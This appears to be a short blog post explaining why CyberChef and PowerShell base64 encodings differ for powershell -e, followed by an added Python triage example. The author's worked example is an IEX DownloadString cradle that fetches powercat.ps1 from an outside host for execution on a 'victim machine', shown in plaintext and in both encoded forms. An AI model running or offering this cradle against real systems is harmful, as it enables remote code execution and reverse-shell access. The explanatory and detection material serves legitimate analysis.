Powershell encoded format generator
init
In one case I discovered a strange issue which I had never faced before. I was trying to execute a PowerShell command as shown below:
IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.56.254:8000/powercat.ps1')
However, interestingly, I used CyberChef to encode the above command to base64 so that I could use powershell -e to decode the code and then execute it on the victim machine.
If the encoding is done in CyberChef, we get the below:
SUVYKE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTkyLjE2OC41Ni4yNTQ6ODAwMC9wb3dlcmNhdC5wczEnKQ==
However, if we try to execute the command on a trial machine, it clearly fails to execute.
encode using powershell
After some debugging I found that there is a significant difference between the base64 encoding done by PowerShell and by CyberChef. If we execute the below:
[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.56.254:8000/powercat.ps1')"))
The output we get in PowerShell is below:
SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADUANgAuADIANQA0ADoAOAAwADAAMAAvAHAAbwB3AGUAcgBjAGEAdAAuAHAAcwAxACcAKQA=
As we can see, there is a significant difference between these two base64-encoded strings. If we try to decode the above base64-encoded string in CyberChef, we get some strange-looking characters.
solve
The difference comes from the text encoding applied before the base64 step. CyberChef encoded the UTF-8 bytes of the input, while PowerShell used Unicode, which in .NET means UTF-16LE, and powershell -e expects the UTF-16LE form. In CyberChef, encode the text as UTF-16LE (1200) first and then apply To Base64 to get a string that PowerShell accepts.
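The byte-level difference described above, as an added Python example that is not code from the original post. It is written for triage of `-e` values found in process logs; the function names are hypothetical and the sample command is a constructed, benign one.

```python
import base64

SAMPLE = "Get-Date"  # constructed benign sample command

def encode_for_powershell(command: str) -> str:
    """Base64 of the UTF-16LE bytes, the form powershell -e expects."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")

def encode_utf8(command: str) -> str:
    """Base64 of the UTF-8 bytes, what a bare To Base64 step produces."""
    return base64.b64encode(command.encode("utf-8")).decode("ascii")

def classify(b64: str):
    """Return (encoding, text) for a base64 value taken from a -e argument."""
    raw = base64.b64decode(b64, validate=True)
    # Mostly-ASCII text in UTF-16LE has a NUL in almost every odd byte position.
    odd = raw[1::2]
    if len(raw) % 2 == 0 and odd and odd.count(0) / len(odd) > 0.8:
        return "utf-16le", raw.decode("utf-16-le")
    try:
        return "utf-8", raw.decode("utf-8")
    except UnicodeDecodeError:
        return "unknown", raw.hex()

def as_powershell_sees_it(b64: str) -> str:
    """Text obtained when the decoded bytes are read as UTF-16LE."""
    return base64.b64decode(b64).decode("utf-16-le", errors="replace")

if __name__ == "__main__":
    good, bad = encode_for_powershell(SAMPLE), encode_utf8(SAMPLE)
    print("UTF-16LE:", good, classify(good))
    print("UTF-8   :", bad, classify(bad))
    # Each pair of UTF-8 bytes is read as one UTF-16 code unit, so the
    # command turns into unrelated characters and cannot run as intended.
    print("UTF-8 read as UTF-16LE:", repr(as_powershell_sees_it(bad)))
```

The same NUL-byte pattern explains the strange characters a generic base64 decoder shows for the PowerShell-generated string: every ASCII character is followed by a zero byte.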